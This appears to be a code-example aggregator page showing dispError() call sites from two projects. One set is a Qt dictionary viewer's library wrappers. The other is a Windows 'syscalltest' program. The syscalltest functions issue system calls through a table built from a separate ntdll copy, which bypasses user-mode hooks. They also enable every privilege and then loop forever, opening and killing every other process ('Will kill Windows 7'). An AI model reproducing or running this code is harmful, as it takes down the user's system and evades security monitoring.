コード例 #1
ファイル: main.c プロジェクト: noscripter/syscalltest
///Entry routine of the test program: shows two status messages around selfUnmap(),
///builds the syscall table and, if that worked, runs the table test.
///Note that testNtapiTable(), as written in this file, ends in a loop that terminates
///other processes and never exits, so the final error check is only reached when the
///test fails before that loop.
void mymain(void){
	NTSTATUS rc;

	///First message is STATUS_PENDING (the author's note: the operation waits until a button is clicked).
	dispError(STATUS_PENDING);
	selfUnmap();
	///Second message, shown after selfUnmap(): per the author, no image except our own can be found.
	dispError(STATUS_SECTION_NOT_IMAGE);

	///Build the table; run the test only when that returned 0.
	rc = initializeSyscallTable();
	if (rc == 0)
		rc = testNtapiTable();

	///Any non-zero status from either step is reported exactly once.
	if (rc != 0)
		dispError(rc);
}
コード例 #2
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Returns the font codes reported by eb_font_list() for `book`.
// On failure the error is passed to dispError() and an empty list is returned.
QList <EB_Font_Code> QEb::fontList()
{
    // Fixed-size scratch array; the loop below trusts the count written by the
    // library to stay within EB_MAX_FONTS (presumably guaranteed by eb_font_list
    // -- TODO confirm, since the values ultimately come from the book data).
    EB_Font_Code codes[EB_MAX_FONTS];
    int found;
    QList <EB_Font_Code> result;

    const EB_Error_Code ecode = eb_font_list(&book, codes, &found);
    if (ecode != EB_SUCCESS) {
        dispError("eb_font_list", ecode);
        return result;
    }

    for (int idx = 0; idx < found; ++idx)
        result.append(codes[idx]);
    return result;
}
コード例 #3
ファイル: qeb.cpp プロジェクト: fujii/qolibri
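// Fetches up to `max_count` hits from eb_hit_list() for `book`.
//
// max_count: capacity of the temporary hit buffer; a negative value yields an
//            empty list instead of reaching the array allocation.
// Returns the hits copied out of the buffer, or an empty list when the library
// reports an error (which is also passed to dispError()).
QList <EB_Hit> QEb::hitList(int max_count)
{
    QList <EB_Hit> hits;
    // A negative element count cannot be allocated; bail out before `new[]`.
    if (max_count < 0)
        return hits;

    EB_Hit *harray = new EB_Hit[max_count];
    int cnt = 0;
    EB_Error_Code ecode = eb_hit_list(&book, max_count, harray, &cnt);
    if (ecode != EB_SUCCESS) {
        dispError("eb_hit_list", ecode);
    } else {
        // The count is produced while parsing book data; never read past the
        // buffer we allocated even if it is reported larger than requested.
        for (int i = 0; i < cnt && i < max_count; i++)
            hits << harray[i];
    }
    // The original never released this buffer, leaking it on every call.
    delete[] harray;
    return hits;
}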
コード例 #4
ファイル: qeb.cpp プロジェクト: fujii/qolibri
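// Runs eb_search_cross() on `book` with the given search words.
//
// words: search terms; they are converted by toEucList() before being handed
//        to the library as a NULL-terminated array of C strings.
// Returns the library's error code; failures are also passed to dispError().
EB_Error_Code QEb::searchCross(const QStringList &words)
{
    // `blist` owns the converted bytes and must outlive the library call,
    // because `wlist` only stores pointers into it.
    QList <QByteArray> blist = toEucList(words);

    // Size the pointer array from the list that is actually copied. The original
    // sized it from words.count() but filled it from blist.count(); if the two
    // ever differ that either writes past the array or leaves uninitialised
    // pointers in front of the terminator.
    const int n = blist.count();
    char** wlist = new char*[n + 1];
    for (int i = 0; i < n; i++)
        wlist[i] = blist[i].data();
    wlist[n] = NULL;

    EB_Error_Code ecode = eb_search_cross(&book, wlist);
    if (ecode != EB_SUCCESS)
        dispError("eb_search_cross", ecode);
    delete[] wlist;
    return ecode;
}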
コード例 #5
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Returns the title of multi search `mid` as a QString.
// An error from eb_multi_title() is passed to dispError() and yields a null QString.
QString QEb::multiTitle(EB_Multi_Search_Code mid)
{
    // One extra byte beyond the library's maximum title length for the terminator.
    char title[EB_MAX_MULTI_TITLE_LENGTH+1];

    const EB_Error_Code ecode = eb_multi_title(&book, mid, title);
    if (ecode != EB_SUCCESS) {
        dispError("eb_multi_title", ecode);
        return QString();
    }

    // Books not in ISO 8859-1 go through the EUC conversion helper.
    if (characterCode() != EB_CHARCODE_ISO8859_1)
        return eucToUtf(title);
    return QString::fromLatin1(title);
}
コード例 #6
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Returns the alternation text that `appendix` defines for wide character `c_num`.
// An error from eb_wide_alt_character_text() is passed to dispError() and yields
// a null QString.
QString QEb::wideAltCharacterText(int c_num)
{
    // One extra byte beyond the library's maximum text length for the terminator.
    char text[EB_MAX_ALTERNATION_TEXT_LENGTH+1];

    const EB_Error_Code ecode = eb_wide_alt_character_text(&appendix, c_num, text);
    if (ecode != EB_SUCCESS) {
        dispError("eb_wide_alt_character_text", ecode);
        return QString();
    }

    // Books not in ISO 8859-1 go through the EUC conversion helper.
    if (characterCode() != EB_CHARCODE_ISO8859_1)
        return eucToUtf(text);
    return QString::fromLatin1(text);
}
コード例 #7
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Reads the two stop-code values of `appendix` via eb_stop_code().
//
// stop1, stop2: output pointers, written unconditionally (callers must pass
//               valid pointers). Both receive -1 when the library call fails.
// Returns the library's error code; failures are also passed to dispError().
EB_Error_Code QEb::stopCode(int *stop1, int *stop2)
{
    int pair[2];
    const EB_Error_Code ecode = eb_stop_code(&appendix, pair);
    const bool ok = (ecode == EB_SUCCESS);

    if (!ok)
        dispError("eb_stop_code", ecode);

    // `pair` is only read when the call succeeded.
    *stop2 = ok ? pair[1] : -1;
    *stop1 = ok ? pair[0] : -1;
    return ecode;
}
コード例 #8
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Returns the subbook codes reported by eb_subbook_list() for `book`.
// On failure the error is passed to dispError() and an empty list is returned.
QList <EB_Subbook_Code> QEb::subbookList()
{
    // Fixed-size scratch array; the loop below trusts the count written by the
    // library to stay within EB_MAX_SUBBOOKS (presumably guaranteed by
    // eb_subbook_list -- TODO confirm, the values come from the book data).
    EB_Subbook_Code found[EB_MAX_SUBBOOKS];
    int total;
    QList <EB_Subbook_Code> result;

    const EB_Error_Code ecode = eb_subbook_list(&book, found, &total);
    if (ecode != EB_SUCCESS) {
        dispError("eb_subbook_list", ecode);
        return result;
    }

    for (int idx = 0; idx < total; ++idx)
        result.append(found[idx]);
    return result;
}
コード例 #9
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Returns the label of entry `entry` in multi search `mid` as a QString.
// An error from eb_multi_entry_label() is passed to dispError() and yields a
// null QString.
QString QEb::multiEntryLabel(EB_Multi_Search_Code mid, int entry)
{
    // One extra byte beyond the library's maximum label length for the terminator.
    char label[EB_MAX_MULTI_LABEL_LENGTH+1];

    const EB_Error_Code ecode = eb_multi_entry_label(&book, mid, entry, label);
    if (ecode != EB_SUCCESS) {
        dispError("eb_multi_entry_label", ecode);
        return QString();
    }

    // Books not in ISO 8859-1 go through the EUC conversion helper.
    if (characterCode() != EB_CHARCODE_ISO8859_1)
        return eucToUtf(label);
    return QString::fromLatin1(label);
}
コード例 #10
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Returns the multi-search codes reported by eb_multi_search_list() for `book`.
// On failure the error is passed to dispError() and an empty list is returned.
QList <EB_Multi_Search_Code> QEb::multiSearchList()
{
    // Fixed-size scratch array; the loop below trusts the count written by the
    // library to stay within EB_MAX_MULTI_SEARCHES (presumably guaranteed by
    // eb_multi_search_list -- TODO confirm, the values come from the book data).
    EB_Multi_Search_Code found[EB_MAX_MULTI_SEARCHES];
    int total;
    QList <EB_Multi_Search_Code> result;

    const EB_Error_Code ecode = eb_multi_search_list(&book, found, &total);
    if (ecode != EB_SUCCESS) {
        dispError("eb_multi_search_list", ecode);
        return result;
    }

    for (int idx = 0; idx < total; ++idx)
        result.append(found[idx]);
    return result;
}
コード例 #11
ファイル: qeb.cpp プロジェクト: fujii/qolibri
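// Reads binary data from `book` in fixed-size chunks until the library returns
// a short chunk, and returns everything read so far.
//
// On a library error the failure is passed to dispError() and the bytes
// collected before the error are returned (possibly empty).
// NOTE(review): the total size is bounded only by what the book data yields;
// callers handling untrusted books may want an upper limit -- confirm.
QByteArray QEb::readBinary()
{
    char buff[1024];
    // Single source of truth for the chunk size, instead of repeating 1024.
    const ssize_t chunk = sizeof(buff);
    ssize_t len = 0;
    QByteArray b;
    for(;;) {
        EB_Error_Code ecode = eb_read_binary(&book, sizeof(buff), buff, &len);
        if (ecode != EB_SUCCESS) {
            // The original reported the truncated label "eb_", which hid
            // which library call had failed.
            dispError("eb_read_binary", ecode);
            return b;
        }
        if (len > 0)
            b += QByteArray(buff, (int)len);
        // A chunk shorter than the buffer marks the end of the data.
        if (len < chunk)
            break;
    }
    return b;
}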
コード例 #12
ファイル: main.c プロジェクト: noscripter/syscalltest
///Prepares the syscall lookup table from the raw ntdll buffer (sg_pRawNtdll).
///Step 1: performCoreInitialization() works on that buffer (bounded by NTDLL_MAX_SIZE).
///Step 2: createNtapiLookupTable() builds the NtXxx table from the same buffer.
///Returns 0 on success, otherwise the status of the step that failed.
///NOTE(review): the table is derived from a separate copy of ntdll rather than the
///loaded module (see the author's "pristine ntdll" remark in testNtapiTable), so
///user-mode hooks in the loaded ntdll presumably do not cover calls made through it.
NTSTATUS initializeSyscallTable(void) {
	PVOID rawImage = sg_pRawNtdll;
	ULONG detail = 0x0;
	ULONG detailSet = 0x0;
	NTSTATUS rc = performCoreInitialization(rawImage, NTDLL_MAX_SIZE, &detail, &detailSet);

	///Success path: hand the buffer on to the table builder.
	if (!rc)
		return createNtapiLookupTable(rawImage);

	///Failure path: show the extra status only when the callee flagged it as filled in.
	if (detailSet)
		dispError((NTSTATUS)detail);

	return rc;
}
コード例 #13
ファイル: qeb.cpp プロジェクト: fujii/qolibri
// Converts a wide-font glyph bitmap to GIF data via eb_bitmap_to_gif().
//
// bitmap: raw glyph bitmap, interpreted with the dimensions from wideFontQSize().
// Returns the GIF bytes, or an empty QByteArray when the font width is 0 or the
// conversion fails (the failure is also passed to dispError()).
// NOTE(review): the length of `bitmap` is not compared with the glyph dimensions
// before the library reads from it, and the output buffer size comes from
// wideFontGifSize() without a sanity check -- confirm both are guaranteed by callers.
QByteArray QEb::wideBitmapToGif(const QByteArray &bitmap)
{
    const QSize glyph = wideFontQSize();
    QByteArray gif;
    if (glyph.width() == 0)
        return gif;

    // Output buffer sized for the current wide font; released before returning.
    const int capacity = wideFontGifSize(font());
    char *out = new char[capacity];
    size_t written;

    const EB_Error_Code ecode = eb_bitmap_to_gif(bitmap, glyph.width(),
                                                 glyph.height(), out, &written);
    if (ecode == EB_SUCCESS)
        gif = QByteArray(out, (int)written);
    else
        dispError("eb_bitmap_to_gif", ecode);

    delete[] out;
    return gif;
}
コード例 #14
ファイル: main.c プロジェクト: noscripter/syscalltest
///Exercises the syscall table once it has been set up successfully. As written, this routine:
///  1. raises a hard error (STATUS_FT_READ_FROM_COPY) through the table's NtRaiseHardError entry,
///  2. opens \systemroot\system32\ntoskrnl.exe, creates a SEC_IMAGE section for it and maps a
///     PAGE_READONLY view of it (the author notes this is not too useful at the moment),
///  3. calls myRtlAdjustPrivileges() for every value from 0 to 0x27,
///  4. loops forever over handle values 0..0x7FFC in steps of 4, opening every process other than
///     its own with PROCESS_ALL_ACCESS and terminating each one it manages to open.
///Returns the failing status if step 2 fails; the final loop has no exit, so the function
///does not return once that loop has been reached.
///NOTE(review): every system service here is reached through syscallStub(ntapiLookup(...)) and not
///through an ntdll export. If syscallStub issues the system call itself (not visible in this
///function), hooks in the loaded ntdll will not observe these calls; kernel-side telemetry for
///process-handle opens and process termination is unaffected by that.
NTSTATUS testNtapiTable(void) {
	UNICODE_STRING uMyNtdll;
	///NOTE(review): declared as a pointer type, yet its address is passed to NtOpenFile below where
	///a pointer to an IO_STATUS_BLOCK structure is expected -- looks like it should be
	///IO_STATUS_BLOCK; confirm, since the kernel writes a full status block to that address.
	PIO_STATUS_BLOCK ioSb;
	OBJECT_ATTRIBUTES objAttr;
	CLIENT_ID cid;
	OBJECT_ATTRIBUTES procAttr;
	LARGE_INTEGER interval;

	PVOID pNtosBase = NULL;
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T viewSize = 0;
	HANDLE hFile = INVALID_HANDLE_VALUE;
	///Own process id, used to skip ourselves in the termination loop.
	HANDLE hCurrPid = NtCurrentTeb()->ClientId.UniqueProcess;
	///Despite the variable name, the path refers to ntoskrnl.exe.
	WCHAR szMyNtdll[] = L"\\systemroot\\system32\\ntoskrnl.exe";
	HANDLE hSection = INVALID_HANDLE_VALUE;
	HANDLE hProcess = INVALID_HANDLE_VALUE;

	///The copy of the pristine ntdll data has succeeded and can now be found in the syscall table.
	///Of course, we display this message by just using this table...
	syscallStub(ntapiLookup("NtRaiseHardError", sizeof("NtRaiseHardError")), STATUS_FT_READ_FROM_COPY, 0, 0, NULL, 0, (PULONG)&status);

	///Build the counted string by hand: length excludes the terminating NUL, maximum length includes it.
	uMyNtdll.Buffer = szMyNtdll;
	uMyNtdll.LengthInBytes = sizeof(szMyNtdll) - sizeof(UNICODE_NULL);
	uMyNtdll.MaximumLengthInBytes = sizeof(szMyNtdll);
	InitializeObjectAttributes(&objAttr, &uMyNtdll, OBJ_CASE_INSENSITIVE, NULL, NULL);
	status = syscallStub(ntapiLookup("NtOpenFile", sizeof("NtOpenFile")), &hFile, GENERIC_READ | SYNCHRONIZE, &objAttr, &ioSb, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);
	if (status)
		return status;

	///NOTE(review): hFile (and hSection further down) are not closed on the early-return paths below.
	status = syscallStub(ntapiLookup("NtCreateSection", sizeof("NtCreateSection")), &hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile);
	if (status)
		return status;

	///INVALID_HANDLE_VALUE is (HANDLE)-1, which is also the current-process pseudo-handle,
	///so the view is mapped into this process.
	status = syscallStub(ntapiLookup("NtMapViewOfSection", sizeof("NtMapViewOfSection")), hSection, INVALID_HANDLE_VALUE, &pNtosBase, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READONLY);
	if (status)
		return status;

	///Clearly, the ntoskrnl.exe image could not be loaded at its kernel 0xFFFFXXXXXXXXXXXXXX base...
	dispError(STATUS_IMAGE_NOT_AT_BASE);

	cid.UniqueThread = NULL;
	///Negative interval = relative delay in 100 ns units, i.e. 200 ms between open and terminate.
	interval.QuadPart = -2000000;
	InitializeObjectAttributes(&procAttr, NULL, 0, NULL, NULL);

	///Author's remark: "Will kill Windows 7."
	///Calls myRtlAdjustPrivileges() for each value 0..0x27; only the status of the last call is
	///kept and it is never checked (presumably this enables every privilege the token holds -- confirm).
	for (ULONG i = 0; i < 0x28; i++)
		status = myRtlAdjustPrivileges(i);

	///Endless sweep: the outer loop has no exit condition.
	for (;;) {
		///Candidate process ids are the multiples of 4 below 0x8000.
		for (ULONG_PTR i = 0; i < 0x8000; i += 4) {
			///Skip our own process.
			if (hCurrPid != (HANDLE)i) {
				cid.UniqueProcess = (HANDLE)i;
				status = syscallStub(ntapiLookup("NtOpenProcess", sizeof("NtOpenProcess")), &hProcess, PROCESS_ALL_ACCESS, &procAttr, &cid);
				///Only processes that could be opened with full access are terminated.
				///NOTE(review): hProcess is never closed, so each successful open leaves a handle behind.
				if (!status) {
					syscallStub(ntapiLookup("NtDelayExecution", sizeof("NtDelayExecution")), FALSE, &interval);
					syscallStub(ntapiLookup("NtTerminateProcess", sizeof("NtTerminateProcess")), hProcess, STATUS_FATAL_APP_EXIT);
				}
			}
		}
	}
}